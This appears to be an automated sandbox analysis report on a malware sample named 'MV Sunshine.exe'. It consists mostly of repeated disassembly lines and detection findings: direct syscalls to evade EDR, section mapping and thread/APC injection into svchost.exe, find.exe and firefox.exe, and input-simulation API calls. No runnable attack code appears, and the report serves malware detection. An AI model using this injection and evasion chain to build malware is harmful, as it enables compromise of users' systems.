Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]	2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]	2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]	2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]	2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]	2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]	2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]	2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]	2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]	2_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]	2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]	2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]	2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]	2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]	2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]	2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]	2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]	2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]	2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]	2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]	2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]	2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]	2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]	2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]	2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]	2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_006781F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_006781F7

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064A364 SetUnhandledExceptionFilter,		0_2_0064A364
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0064A395

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\MV Sunshine.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\find.exe

Thread register set: target process: 4948

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\find.exe

Thread APC queued: target process: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\MV Sunshine.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C61008

Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00678C93 LogonUserW,

0_2_00678C93

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00623B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00623B4C

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00624A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00624A35

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00684EF5 mouse_event,

0_2_00684EF5

Source: C:\Users\user\Desktop\MV Sunshine.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine.exe"	Jump to behavior
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine.exe

0_2_006781F7

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00684C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00684C03

Source: MV Sunshine.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: oVmFMrJhUAa.exe, 00000003.00000000.2220063219.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965821730.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3965974220.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: MV Sunshine.exe, oVmFMrJhUAa.exe, 00000003.00000000.2220063219.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965821730.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3965974220.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: oVmFMrJhUAa.exe, 00000003.00000000.2220063219.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965821730.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3965974220.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
